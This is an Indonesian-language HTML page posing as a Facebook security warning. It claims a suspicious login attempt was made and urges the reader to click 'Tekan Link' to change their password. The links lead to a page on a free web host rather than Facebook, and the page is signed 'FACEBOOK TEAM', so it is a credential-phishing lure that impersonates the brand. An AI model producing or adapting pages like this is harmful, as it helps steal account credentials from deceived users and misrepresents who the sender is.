<!DOCTYPE html>
<html lang="in">
<head>
    <title>Facebook</title>
</head>
<body>
  <h1><center><b><font color="blue">FACEBOOK</font> ANDA TERANCAM</b></center></h1>
  <h5><i>Ubah kata sandi anda</i></h5>
  <p>Seertinya seseorang mencoba masuk ke akun Anda pada <b>12 Maret pukul 00.03 menggunakan Chrome untuk Windows 7.</b>kami hanya ingin memastikan bahwa itu adalah Anda yang mencoba masuk meggunakan perangkat baru.</p>
  <p>Jika Anda merasa ini bukan Anda, silakan masuk ke Facebook sehingga kami dapat memandu Anda melalui beberapa langkah untuk mengamankan akun.</p>
  <p>.</p>
  <p>.</p>
  <p>klik link dibawah untuk mengganti kata sandi:</p>
  <p><center><a href="https://diamon111.000webhostapp.com/fb-pulu/join.html"><b>Tekan Link<b></a></center></p>
            <small><a href="https://diamon111.000webhostapp.com/fb-pulu/join.html">FACEBOOK TEAM</i></a></small>
</body>
</html>
